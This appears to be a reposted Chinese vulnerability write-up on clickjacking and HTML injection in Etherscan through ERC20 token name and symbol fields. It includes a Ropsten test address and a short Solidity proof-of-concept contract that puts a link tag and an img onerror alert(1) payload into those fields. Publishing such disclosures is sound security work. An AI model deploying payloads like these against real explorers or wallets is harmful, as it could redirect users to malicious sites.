etherscan点击劫持漏洞

  • A+
所属分类:安全文章

点击蓝字  关注我们

01

漏洞描述

部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。

在用户访问点击页面内的合约名字,可以劫持至任意网站。

02

漏洞详情

需要部署ERC20标准的合约,且在访问合约页面之前,发起一次交易。

https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns

etherscan点击劫持漏洞

exp:

pragma solidity ^0.4.24;
contract MyTest { mapping(address => uint256) balances; uint256 public totalSupply; mapping (address => mapping (address => uint256)) allowance; address public owner; string public name; string public symbol; uint8 public decimals = 18; event Transfer(address indexed _from, address indexed _to, uint256 _value); function MyTest() { name = "<a href=http://baidu.com>12321</a>"; symbol = 'ok<img src=/ onerror=alert(1)> '; totalSupply = 100000000000000000000000000000000000; } function mylog(address arg0, address arg1, uint256 arg2) public { Transfer(arg0, arg1, arg2); }}
etherscan点击劫持漏洞


本文始发于微信公众号(IDLab):etherscan点击劫持漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: